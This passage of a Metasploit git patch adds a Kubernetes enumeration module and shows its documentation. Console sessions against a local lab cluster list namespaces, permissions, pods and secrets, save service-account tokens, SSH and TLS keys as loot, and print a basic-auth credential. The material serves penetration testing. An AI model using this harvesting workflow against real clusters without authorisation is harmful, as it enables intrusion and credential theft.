From 803fc808e0422833cf47a0e4186f68055c78ddb0 Mon Sep 17 00:00:00 2001
From: adfoster-r7 <alandavid_foster@rapid7.com>
Date: Fri, 17 Sep 2021 16:08:32 +0100
Subject: [PATCH 1/4] Add kubernetes enum module

---
 .../cloud/kubernetes/enum_kubernetes.md       | 513 ++++++++++++++++++
 lib/msf/core/exploit/remote/http/jwt.rb       |  23 +
 .../core/exploit/remote/http/kubernetes.rb    |  99 ++++
 .../remote/http/kubernetes/auth_parser.rb     | 193 +++++++
 .../exploit/remote/http/kubernetes/client.rb  | 112 +++-
 .../remote/http/kubernetes/enumeration.rb     | 214 ++++++++
 .../exploit/remote/http/kubernetes/error.rb   |  28 +-
 .../exploit/remote/http/kubernetes/output.rb  |   5 +
 .../remote/http/kubernetes/output/json.rb     |  53 ++
 .../remote/http/kubernetes/output/table.rb    | 164 ++++++
 .../exploit/remote/http/kubernetes/secret.rb  |  29 +
 lib/msf/ui/console/module_action_commands.rb  |  22 +-
 lib/msf/ui/console/module_argument_parsing.rb |   2 +-
 .../ui/console/table_print/age_formatter.rb   |  55 ++
 .../table_print/highlight_substring_styler.rb |  10 +-
 lib/msf_autoload.rb                           |   1 +
 .../cloud/kubernetes/enum_kubernetes.rb       | 104 ++++
 modules/exploits/multi/kubernetes/exec.rb     |  90 +--
 .../http/kubernetes/auth_parser_spec.rb       |  65 +++
 .../console/table_print/age_formatter_spec.rb |  52 ++
 .../highlight_substring_styler_spec.rb        |   7 +
 .../console/module_argument_parsing_spec.rb   |  34 ++
 spec/support/shared/contexts/msf/ui_driver.rb |  18 +-
 23 files changed, 1769 insertions(+), 124 deletions(-)
 create mode 100644 documentation/modules/auxiliary/cloud/kubernetes/enum_kubernetes.md
 create mode 100644 lib/msf/core/exploit/remote/http/jwt.rb
 create mode 100644 lib/msf/core/exploit/remote/http/kubernetes.rb
 create mode 100644 lib/msf/core/exploit/remote/http/kubernetes/auth_parser.rb
 create mode 100644 lib/msf/core/exploit/remote/http/kubernetes/enumeration.rb
 create mode 100644 lib/msf/core/exploit/remote/http/kubernetes/output.rb
 create mode 100644 lib/msf/core/exploit/remote/http/kubernetes/output/json.rb
 create mode 100644 lib/msf/core/exploit/remote/http/kubernetes/output/table.rb
 create mode 100644 lib/msf/core/exploit/remote/http/kubernetes/secret.rb
 create mode 100644 lib/msf/ui/console/table_print/age_formatter.rb
 create mode 100644 modules/auxiliary/cloud/kubernetes/enum_kubernetes.rb
 create mode 100644 spec/lib/msf/exploit/remote/http/kubernetes/auth_parser_spec.rb
 create mode 100644 spec/lib/msf/ui/console/table_print/age_formatter_spec.rb

diff --git a/documentation/modules/auxiliary/cloud/kubernetes/enum_kubernetes.md b/documentation/modules/auxiliary/cloud/kubernetes/enum_kubernetes.md
new file mode 100644
index 000000000000..3b6b5c31631c
--- /dev/null
+++ b/documentation/modules/auxiliary/cloud/kubernetes/enum_kubernetes.md
@@ -0,0 +1,513 @@
+## Vulnerable Application
+
+### Description
+
+Enumerates a Kubernetes cluster.
+
+## Verification Steps
+
+### Create or acquire the credentials
+
+1. Start msfconsole
+2. Do: `use auxiliary/cloud/kubernetes/enum_kubernetes`
+3. Set the required options
+4. Do: `run`
+5: You should see the enumerated resources from the Kubernetes API.
+
+## Options
+
+### SESSION
+An optional session to use for configuration. When specified, the values of `NAMESPACE`, `TOKEN`, `RHOSTS` and `RPORT`
+will be gathered from the session host. This requires that the session be on an existing Kubernetes pod. The necessary
+values may not always be present.
+
+Setting this option will also automatically route connections through the specified session.
+
+### TOKEN
+The JWT token. The token with the necessary privileges to access the exec endpoint within a running pod and optionally
+create a new pod.
+
+### POD
+The pod name to execute in. When not specified, a new pod will be created with an entrypoint that allows it to run
+forever. After creation, the pod will be used to execute the payload. **The created pod is not automatically cleaned
+up.** A note containing the created pod's information will be added to the database when it is connected.
+
+### NAMESPACE
+The Kubernetes namespace that the `TOKEN` has permissions for and that `POD` either exists in or should be created in.
+
+### NAMESPACE_LIST
+
+The default namespace list to iterate when the current token does not have the permission to retrieve the available namespaces
+
+### HIGHLIGHT_NAME_PATTERN
+A PCRE regex of resource names to highlight.
+
+### OUTPUT
+Output format, allowed values are: table, json
+
+## Scenarios
+
+### Run all enumeration
+
+Explicitly setting RHOST and TOKEN to enumerate all available namespaces, and associated resources:
+
+```
+msf6 > use cloud/kubernetes/enum_kubernetes
+msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set RHOST https://kubernetes.docker.internal:6443
+RHOST => https://kubernetes.docker.internal:6443
+msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set TOKEN eyJhbGciO...
+TOKEN => eyJhbGciO...
+msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > run
+[*] Running module against 127.0.0.1
+
+[+] Kubernetes service version: {"major":"1","minor":"21","gitVersion":"v1.21.2","gitCommit":"092fbfbf53427de67cac1e9fa54aaa09a28371d7","gitTreeState":"clean","buildDate":"2021-06-16T12:53:14Z","goVersion":"go1.16.5","compiler":"gc","platform":"linux/amd64"}
+[+] Enumerating namespaces
+Namespaces
+==========
+
+  #  name
+  -  ----
+  0  default
+  1  kube-node-lease
+  2  kube-public
+  3  kube-system
+  4  kubernetes-dashboard
+
+[+] Namespace 0: default
+Auth (namespace: default)
+=========================
+
+  Resources                                      Non-Resource URLs                    Resource Names  Verbs
+  ---------                                      -----------------                    --------------  -----
+  *.*                                            []                                   []              [*]
+  selfsubjectaccessreviews.authorization.k8s.io  []                                   []              [create]
+  selfsubjectrulesreviews.authorization.k8s.io   []                                   []              [create]
+                                                 [*]                                  []              [*]
+                                                 [/.well-known/openid-configuration]  []              [get]
+                                                 [/api/*]                             []              [get]
+                                                 [/api]                               []              [get]
+                                                 [/apis/*]                            []              [get]
+                                                 [/apis]                              []              [get]
+                                                 [/healthz]                           []              [get]
+                                                 [/healthz]                           []              [get]
+                                                 [/livez]                             []              [get]
+                                                 [/livez]                             []              [get]
+                                                 [/openapi/*]                         []              [get]
+                                                 [/openapi]                           []              [get]
+                                                 [/openid/v1/jwks]                    []              [get]
+                                                 [/readyz]                            []              [get]
+                                                 [/readyz]                            []              [get]
+                                                 [/version/]                          []              [get]
+                                                 [/version/]                          []              [get]
+                                                 [/version]                           []              [get]
+                                                 [/version]                           []              [get]
+
+Pods (namespace: default)
+=========================
+
+  #   namespace  name                       status   containers                                       ip
+  -   ---------  ----                       ------   ----------                                       --
+  0   default    a4bg7r                     Running  iyxz0ujfck9t (image: vulhub/thinkphp:5.0.23)     10.1.1.51
+  1   default    appjokbpiiml               Running  iggapn (image: vulhub/thinkphp:5.0.23)           10.1.1.57
+  2   default    cvyf4m9le                  Running  t0e93vcuyi (image: vulhub/thinkphp:5.0.23)       10.1.1.53
+  3   default    fh4bfdtf                   Running  dygvv (image: vulhub/thinkphp:5.0.23)            10.1.1.52
+  4   default    gavp                       Running  jfwdaei (image: vulhub/thinkphp:5.0.23)          10.1.1.58
+  5   default    mkfkuwd6hkd1               Running  aoavh (image: vulhub/thinkphp:5.0.23)            10.1.1.62
+  6   default    nid7jd                     Running  geb (image: vulhub/thinkphp:5.0.23)              10.1.1.45
+  7   default    redis-7fd956df5-sbchb      Running  redis (image: redis:5.0.4 TCP:6379)              10.1.1.56
+  8   default    thinkphp-67f7c88cc9-djg6q  Running  thinkphp (image: vulhub/thinkphp:5.0.23 TCP:80)  10.1.1.55
+  9   default    thinkphp-67f7c88cc9-l56mg  Running  thinkphp (image: vulhub/thinkphp:5.0.23 TCP:80)  10.1.1.44
+  10  default    usuuucs                    Running  xfcw (image: vulhub/thinkphp:5.0.23)             10.1.1.50
+  11  default    v2xxl7z                    Running  nu3s (image: vulhub/thinkphp:5.0.23)             10.1.1.61
+  12  default    yulfpaohsepk               Running  jjmxkkzgkmy (image: vulhub/thinkphp:5.0.23)      10.1.1.47
+
+Secrets (namespace: default)
+============================
+
+  #  namespace  name                                  type                                 data                    age
+  -  ---------  ----                                  ----                                 ----                    ---
+  0  default    default-token-btlkb                   kubernetes.io/service-account-token  ca.crt,namespace,token  8d
+  1  default    local-registry                        kubernetes.io/dockerconfigjson       .dockerconfigjson       7d15h
+  2  default    secret-basic-auth                     kubernetes.io/basic-auth             password,username       8d
+  3  default    secret-empty                          Opaque                                                       8d
+  4  default    secret-id-ed25519-with-passphrase     kubernetes.io/ssh-auth               ssh-privatekey          7d15h
+  5  default    secret-id-ed25519-without-passphrase  kubernetes.io/ssh-auth               ssh-privatekey          7d15h
+  6  default    secret-id-rsa-with-passphrase         kubernetes.io/ssh-auth               ssh-privatekey          8d
+  7  default    secret-id-rsa-without-passphrase      kubernetes.io/ssh-auth               ssh-privatekey          8d
+  8  default    secret-tls                            kubernetes.io/tls                    tls.crt,tls.key         8d
+
+[+] service token default-token-btlkb: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_257374.bin
+[+] dockerconfig json local-registry: /Users/user/.msf4/loot/20211006105714_default_unknown_docker.json_543280.bin
+[+] basic_auth secret-basic-auth: admin:password213
+[+] ssh_key secret-id-ed25519-with-passphrase: /Users/user/.msf4/loot/20211006105714_default_unknown_id_rsa_861231.txt
+[+] ssh_key secret-id-ed25519-without-passphrase: /Users/user/.msf4/loot/20211006105714_default_unknown_id_rsa_095417.txt
+[+] ssh_key secret-id-rsa-with-passphrase: /Users/user/.msf4/loot/20211006105714_default_unknown_id_rsa_246326.txt
+[+] ssh_key secret-id-rsa-without-passphrase: /Users/user/.msf4/loot/20211006105714_default_unknown_id_rsa_429821.txt
+[+] tls_key secret-tls: /Users/user/.msf4/loot/20211006105714_default_unknown_tls.key_651137.txt
+[+] tls_cert secret-tls: /Users/user/.msf4/loot/20211006105714_default_unknown_tls.cert_025932.txt (/CN=example.com)
+
+[+] Namespace 1: kube-node-lease
+Auth (namespace: kube-node-lease)
+=================================
+
+  Resources                                      Non-Resource URLs                    Resource Names  Verbs
+  ---------                                      -----------------                    --------------  -----
+  *.*                                            []                                   []              [*]
+  selfsubjectaccessreviews.authorization.k8s.io  []                                   []              [create]
+  selfsubjectrulesreviews.authorization.k8s.io   []                                   []              [create]
+                                                 [*]                                  []              [*]
+                                                 [/.well-known/openid-configuration]  []              [get]
+                                                 [/api/*]                             []              [get]
+                                                 [/api]                               []              [get]
+                                                 [/apis/*]                            []              [get]
+                                                 [/apis]                              []              [get]
+                                                 [/healthz]                           []              [get]
+                                                 [/healthz]                           []              [get]
+                                                 [/livez]                             []              [get]
+                                                 [/livez]                             []              [get]
+                                                 [/openapi/*]                         []              [get]
+                                                 [/openapi]                           []              [get]
+                                                 [/openid/v1/jwks]                    []              [get]
+                                                 [/readyz]                            []              [get]
+                                                 [/readyz]                            []              [get]
+                                                 [/version/]                          []              [get]
+                                                 [/version/]                          []              [get]
+                                                 [/version]                           []              [get]
+                                                 [/version]                           []              [get]
+
+Pods (namespace: kube-node-lease)
+=================================
+
+  #  namespace  name  status  containers  ip
+  -  ---------  ----  ------  ----------  --
+  No rows
+
+Secrets (namespace: kube-node-lease)
+====================================
+
+  #  namespace        name                 type                                 data                    age
+  -  ---------        ----                 ----                                 ----                    ---
+  0  kube-node-lease  default-token-54967  kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+
+[+] service token default-token-54967: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_727718.bin
+
+[+] Namespace 2: kube-public
+Auth (namespace: kube-public)
+=============================
+
+  Resources                                      Non-Resource URLs                    Resource Names  Verbs
+  ---------                                      -----------------                    --------------  -----
+  *.*                                            []                                   []              [*]
+  selfsubjectaccessreviews.authorization.k8s.io  []                                   []              [create]
+  selfsubjectrulesreviews.authorization.k8s.io   []                                   []              [create]
+                                                 [*]                                  []              [*]
+                                                 [/.well-known/openid-configuration]  []              [get]
+                                                 [/api/*]                             []              [get]
+                                                 [/api]                               []              [get]
+                                                 [/apis/*]                            []              [get]
+                                                 [/apis]                              []              [get]
+                                                 [/healthz]                           []              [get]
+                                                 [/healthz]                           []              [get]
+                                                 [/livez]                             []              [get]
+                                                 [/livez]                             []              [get]
+                                                 [/openapi/*]                         []              [get]
+                                                 [/openapi]                           []              [get]
+                                                 [/openid/v1/jwks]                    []              [get]
+                                                 [/readyz]                            []              [get]
+                                                 [/readyz]                            []              [get]
+                                                 [/version/]                          []              [get]
+                                                 [/version/]                          []              [get]
+                                                 [/version]                           []              [get]
+                                                 [/version]                           []              [get]
+
+Pods (namespace: kube-public)
+=============================
+
+  #  namespace  name  status  containers  ip
+  -  ---------  ----  ------  ----------  --
+  No rows
+
+Secrets (namespace: kube-public)
+================================
+
+  #  namespace    name                 type                                 data                    age
+  -  ---------    ----                 ----                                 ----                    ---
+  0  kube-public  default-token-2r2s4  kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+
+[+] service token default-token-2r2s4: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_198155.bin
+
+[+] Namespace 3: kube-system
+Auth (namespace: kube-system)
+=============================
+
+  Resources                                      Non-Resource URLs                    Resource Names  Verbs
+  ---------                                      -----------------                    --------------  -----
+  *.*                                            []                                   []              [*]
+  selfsubjectaccessreviews.authorization.k8s.io  []                                   []              [create]
+  selfsubjectrulesreviews.authorization.k8s.io   []                                   []              [create]
+                                                 [*]                                  []              [*]
+                                                 [/.well-known/openid-configuration]  []              [get]
+                                                 [/api/*]                             []              [get]
+                                                 [/api]                               []              [get]
+                                                 [/apis/*]                            []              [get]
+                                                 [/apis]                              []              [get]
+                                                 [/healthz]                           []              [get]
+                                                 [/healthz]                           []              [get]
+                                                 [/livez]                             []              [get]
+                                                 [/livez]                             []              [get]
+                                                 [/openapi/*]                         []              [get]
+                                                 [/openapi]                           []              [get]
+                                                 [/openid/v1/jwks]                    []              [get]
+                                                 [/readyz]                            []              [get]
+                                                 [/readyz]                            []              [get]
+                                                 [/version/]                          []              [get]
+                                                 [/version/]                          []              [get]
+                                                 [/version]                           []              [get]
+                                                 [/version]                           []              [get]
+
+Pods (namespace: kube-system)
+=============================
+
+  #  namespace    name                                    status   containers                                                                   ip
+  -  ---------    ----                                    ------   ----------                                                                   --
+  0  kube-system  coredns-558bd4d5db-2fspm                Running  coredns (image: k8s.gcr.io/coredns/coredns:v1.8.0 UDP:53,TCP:53,TCP:9153)    10.1.1.48
+  1  kube-system  coredns-558bd4d5db-zx7k5                Running  coredns (image: k8s.gcr.io/coredns/coredns:v1.8.0 UDP:53,TCP:53,TCP:9153)    10.1.1.59
+  2  kube-system  etcd-docker-desktop                     Running  etcd (image: k8s.gcr.io/etcd:3.4.13-0)                                       192.168.65.4
+  3  kube-system  kube-apiserver-docker-desktop           Running  kube-apiserver (image: k8s.gcr.io/kube-apiserver:v1.21.2)                    192.168.65.4
+  4  kube-system  kube-controller-manager-docker-desktop  Running  kube-controller-manager (image: k8s.gcr.io/kube-controller-manager:v1.21.2)  192.168.65.4
+  5  kube-system  kube-proxy-tvgm2                        Running  kube-proxy (image: k8s.gcr.io/kube-proxy:v1.21.2)                            192.168.65.4
+  6  kube-system  kube-scheduler-docker-desktop           Running  kube-scheduler (image: k8s.gcr.io/kube-scheduler:v1.21.2)                    192.168.65.4
+  7  kube-system  storage-provisioner                     Running  storage-provisioner (image: docker/desktop-storage-provisioner:v2.0)         10.1.1.49
+  8  kube-system  vpnkit-controller                       Running  vpnkit-controller (image: docker/desktop-vpnkit-controller:v2.0)             10.1.1.54
+
+Secrets (namespace: kube-system)
+================================
+
+  #   namespace    name                                            type                                 data                    age
+  -   ---------    ----                                            ----                                 ----                    ---
+  0   kube-system  attachdetach-controller-token-4tnpl             kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  1   kube-system  bootstrap-signer-token-kqgwd                    kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  2   kube-system  certificate-controller-token-g2lcs              kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  3   kube-system  clusterrole-aggregation-controller-token-9kh9j  kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  4   kube-system  coredns-token-xjv86                             kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  5   kube-system  cronjob-controller-token-wddp5                  kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  6   kube-system  daemon-set-controller-token-7w2wt               kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  7   kube-system  default-token-hq24x                             kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  8   kube-system  deployment-controller-token-bf8ks               kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  9   kube-system  disruption-controller-token-j4mlp               kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  10  kube-system  endpoint-controller-token-sqdg2                 kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  11  kube-system  endpointslice-controller-token-wr2v9            kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  12  kube-system  endpointslicemirroring-controller-token-4lqdn   kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  13  kube-system  ephemeral-volume-controller-token-67k95         kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  14  kube-system  expand-controller-token-cmfwt                   kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  15  kube-system  generic-garbage-collector-token-sxdc8           kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  16  kube-system  horizontal-pod-autoscaler-token-267qc           kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  17  kube-system  job-controller-token-hzv9p                      kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  18  kube-system  kube-proxy-token-cqw2h                          kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  19  kube-system  namespace-controller-token-cldm6                kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  20  kube-system  node-controller-token-tjtk5                     kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  21  kube-system  persistent-volume-binder-token-2n7jx            kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  22  kube-system  pod-garbage-collector-token-vgzrz               kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  23  kube-system  pv-protection-controller-token-5jvqn            kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  24  kube-system  pvc-protection-controller-token-jg5sn           kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  25  kube-system  replicaset-controller-token-zvblz               kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  26  kube-system  replication-controller-token-tcj4p              kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  27  kube-system  resourcequota-controller-token-q5nsg            kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  28  kube-system  root-ca-cert-publisher-token-ghh92              kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  29  kube-system  service-account-controller-token-ljxn7          kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  30  kube-system  service-controller-token-dg8ks                  kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  31  kube-system  statefulset-controller-token-dcx8k              kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  32  kube-system  storage-provisioner-token-52m2w                 kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  33  kube-system  token-cleaner-token-lc8jh                       kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  34  kube-system  ttl-after-finished-controller-token-qkv66       kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  35  kube-system  ttl-controller-token-rw6zq                      kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  36  kube-system  vpnkit-controller-token-l9ljz                   kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+
+[+] service token attachdetach-controller-token-4tnpl: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_443806.bin
+[+] service token bootstrap-signer-token-kqgwd: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_334381.bin
+[+] service token certificate-controller-token-g2lcs: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_780446.bin
+[+] service token clusterrole-aggregation-controller-token-9kh9j: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_695659.bin
+[+] service token coredns-token-xjv86: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_035400.bin
+[+] service token cronjob-controller-token-wddp5: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_256456.bin
+[+] service token daemon-set-controller-token-7w2wt: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_370856.bin
+[+] service token default-token-hq24x: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_167584.bin
+[+] service token deployment-controller-token-bf8ks: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_668044.bin
+[+] service token disruption-controller-token-j4mlp: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_025629.bin
+[+] service token endpoint-controller-token-sqdg2: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_952597.bin
+[+] service token endpointslice-controller-token-wr2v9: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_454535.bin
+[+] service token endpointslicemirroring-controller-token-4lqdn: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_573333.bin
+[+] service token ephemeral-volume-controller-token-67k95: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_791145.bin
+[+] service token expand-controller-token-cmfwt: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_350984.bin
+[+] service token generic-garbage-collector-token-sxdc8: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_095555.bin
+[+] service token horizontal-pod-autoscaler-token-267qc: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_696872.bin
+[+] service token job-controller-token-hzv9p: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_709657.bin
+[+] service token kube-proxy-token-cqw2h: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_148992.bin
+[+] service token namespace-controller-token-cldm6: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_138901.bin
+[+] service token node-controller-token-tjtk5: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_113414.bin
+[+] service token persistent-volume-binder-token-2n7jx: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_154991.bin
+[+] service token pod-garbage-collector-token-vgzrz: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_413568.bin
+[+] service token pv-protection-controller-token-5jvqn: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_233791.bin
+[+] service token pvc-protection-controller-token-jg5sn: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_468067.bin
+[+] service token replicaset-controller-token-zvblz: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_821269.bin
+[+] service token replication-controller-token-tcj4p: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_210131.bin
+[+] service token resourcequota-controller-token-q5nsg: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_510682.bin
+[+] service token root-ca-cert-publisher-token-ghh92: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_341707.bin
+[+] service token service-account-controller-token-ljxn7: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_242421.bin
+[+] service token service-controller-token-dg8ks: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_231000.bin
+[+] service token statefulset-controller-token-dcx8k: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_346820.bin
+[+] service token storage-provisioner-token-52m2w: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_889808.bin
+[+] service token token-cleaner-token-lc8jh: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_071179.bin
+[+] service token ttl-after-finished-controller-token-qkv66: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_155663.bin
+[+] service token ttl-controller-token-rw6zq: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_730592.bin
+[+] service token vpnkit-controller-token-l9ljz: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_693223.bin
+
+[+] Namespace 4: kubernetes-dashboard
+Auth (namespace: kubernetes-dashboard)
+======================================
+
+  Resources                                      Non-Resource URLs                    Resource Names  Verbs
+  ---------                                      -----------------                    --------------  -----
+  *.*                                            []                                   []              [*]
+  selfsubjectaccessreviews.authorization.k8s.io  []                                   []              [create]
+  selfsubjectrulesreviews.authorization.k8s.io   []                                   []              [create]
+                                                 [*]                                  []              [*]
+                                                 [/.well-known/openid-configuration]  []              [get]
+                                                 [/api/*]                             []              [get]
+                                                 [/api]                               []              [get]
+                                                 [/apis/*]                            []              [get]
+                                                 [/apis]                              []              [get]
+                                                 [/healthz]                           []              [get]
+                                                 [/healthz]                           []              [get]
+                                                 [/livez]                             []              [get]
+                                                 [/livez]                             []              [get]
+                                                 [/openapi/*]                         []              [get]
+                                                 [/openapi]                           []              [get]
+                                                 [/openid/v1/jwks]                    []              [get]
+                                                 [/readyz]                            []              [get]
+                                                 [/readyz]                            []              [get]
+                                                 [/version/]                          []              [get]
+                                                 [/version/]                          []              [get]
+                                                 [/version]                           []              [get]
+                                                 [/version]                           []              [get]
+
+Pods (namespace: kubernetes-dashboard)
+======================================
+
+  #  namespace             name                                        status   containers                                                                       ip
+  -  ---------             ----                                        ------   ----------                                                                       --
+  0  kubernetes-dashboard  dashboard-metrics-scraper-856586f554-c2pz5  Running  dashboard-metrics-scraper (image: kubernetesui/metrics-scraper:v1.0.6 TCP:8000)  10.1.1.60
+  1  kubernetes-dashboard  kubernetes-dashboard-67484c44f6-4hh4j       Running  kubernetes-dashboard (image: kubernetesui/dashboard:v2.3.1 TCP:8443)             10.1.1.46
+
+Secrets (namespace: kubernetes-dashboard)
+=========================================
+
+  #  namespace             name                              type                                 data                    age
+  -  ---------             ----                              ----                                 ----                    ---
+  0  kubernetes-dashboard  default-token-6gwtz               kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+  1  kubernetes-dashboard  kubernetes-dashboard-certs        Opaque                                                       19d
+  2  kubernetes-dashboard  kubernetes-dashboard-csrf         Opaque                               csrf                    19d
+  3  kubernetes-dashboard  kubernetes-dashboard-key-holder   Opaque                               priv,pub                19d
+  4  kubernetes-dashboard  kubernetes-dashboard-token-gfhhr  kubernetes.io/service-account-token  ca.crt,namespace,token  19d
+
+[+] service token default-token-6gwtz: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_854995.bin
+[+] service token kubernetes-dashboard-token-gfhhr: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_729795.bin
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(cloud/kubernetes/enum_kubernetes) >
+```
+
+### Using actions
+
+See available actions:
+
+```
+msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show actions
+
+Auxiliary actions:
+
+   Name        Description
+   ----        -----------
+   all         enumerate all resources
+   auth        enumerate auth
+   namespace   enumerate namespace
+   namespaces  enumerate namespaces
+   pod         enumerate pod
+   pods        enumerate pods
+   secret      enumerate secret
+   secrets     enumerate secrets
+   version     enumerate version
+
+```
+
+Enumerate pods:
+```
+msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > pods
+[*] Running module against 127.0.0.1
+Pods (namespace: default)
+=========================
+
+  #   namespace  name                       status   containers                                       ip
+  -   ---------  ----                       ------   ----------                                       --
+  0   default    a4bg7r                     Running  iyxz0ujfck9t (image: vulhub/thinkphp:5.0.23)     10.1.1.51
+  1   default    appjokbpiiml               Running  iggapn (image: vulhub/thinkphp:5.0.23)           10.1.1.57
+  2   default    cvyf4m9le                  Running  t0e93vcuyi (image: vulhub/thinkphp:5.0.23)       10.1.1.53
+  3   default    fh4bfdtf                   Running  dygvv (image: vulhub/thinkphp:5.0.23)            10.1.1.52
+  4   default    gavp                       Running  jfwdaei (image: vulhub/thinkphp:5.0.23)          10.1.1.58
+  5   default    mkfkuwd6hkd1               Running  aoavh (image: vulhub/thinkphp:5.0.23)            10.1.1.62
+  6   default    nid7jd                     Running  geb (image: vulhub/thinkphp:5.0.23)              10.1.1.45
+  7   default    redis-7fd956df5-sbchb      Running  redis (image: redis:5.0.4 TCP:6379)              10.1.1.56
+  8   default    thinkphp-67f7c88cc9-djg6q  Running  thinkphp (image: vulhub/thinkphp:5.0.23 TCP:80)  10.1.1.55
+  9   default    thinkphp-67f7c88cc9-l56mg  Running  thinkphp (image: vulhub/thinkphp:5.0.23 TCP:80)  10.1.1.44
+  10  default    usuuucs                    Running  xfcw (image: vulhub/thinkphp:5.0.23)             10.1.1.50
+  11  default    v2xxl7z                    Running  nu3s (image: vulhub/thinkphp:5.0.23)             10.1.1.61
+  12  default    yulfpaohsepk               Running  jjmxkkzgkmy (image: vulhub/thinkphp:5.0.23)      10.1.1.47
+
+
+[*] Auxiliary module execution completed
+```
+
+Enumerate a pod with a specified namespace, name:
+
+```
+msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > pod namespace=default name=redis-7fd956df5-sbchb
+[*] Running module against 127.0.0.1
+Pods (namespace: default)
+=========================
+
+  #  namespace  name                   status   containers                           ip
+  -  ---------  ----                   ------   ----------                           --
+  0  default    redis-7fd956df5-sbchb  Running  redis (image: redis:5.0.4 TCP:6379)  10.1.1.56
+
+
+[*] Auxiliary module execution completed
+```
+
+Enumerate a pod with a specified namespace, name, and outputting the result as JSON:
+
+```
